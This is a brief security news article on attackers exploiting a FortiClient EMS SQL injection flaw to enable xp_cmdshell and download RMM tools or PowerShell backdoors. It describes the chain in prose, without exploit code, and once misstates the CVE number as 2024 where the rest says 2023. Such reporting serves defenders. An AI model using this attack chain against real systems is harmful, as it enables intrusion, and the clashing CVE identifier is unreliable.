Threat actors have been discovered exploiting a Fortinet FortiClient EMS vulnerability to install unauthorised RMM tools and PowerShell backdoors on the targeted systems. The vulnerability exploited by the threat actors was CVE-2023-48788. Moreover, an external inbound network connection was found to connect with the FCMdaemon process, followed by downloading and executing RMM tools or PowerShell-based backdoors. However, Fortinet addressed this vulnerability in March 2024; its severity was 9.8 (Critical).

This vulnerability allows unauthenticated users to execute commands with SYSTEM privileges through specially crafted messages. Horizon3 researchers published a complete report on the exploitation. To provide a brief explanation, CVE-2024-48788 was associated with SQL injection on Forticlient EMS applications.

The threat actors’ exploitation begins with an external IP address attempting to connect with a specially crafted request to the Forticlient EMS application’s FCMdaemon process through port 8013. Hence, if the Forticlient application runs an unpatched version, it can receive a specially crafted message from the threat actors, resulting in an SQL injection attack. Further, the threat actors utilise this SQL injection to enable `xp_cmdshell` to execute commands via `cmd.exe`. If the attack succeeds, the `sqlserver.exe` (which runs on `\\MSSQL14.FCEMS\\`) will spawn the `cmd.exe` instance, executing SYSTEM-level commands.

Once they have established this connection with elevated privileges, the threat actors use PowerShell Invoke-WebRequest cmdlets to download a Windows installer (.msi) file from a malicious IP address. The MSI installers typically contain a Remote Monitoring and Management (RMM) tool, which the threat actors launch using the `msiexec.exe` process. In some instances, failures of RMM tool installations and unsuccessful attempts of PowerShell backdoor deployments were also noticed. The threat actors took only 36 seconds to 47 minutes from initial access to install the RMM tools or backdoor.

For more details, please visit the main article: Fortinet Vulnerability Exploited To Deploy RMM tools And PowerShell Backdoors.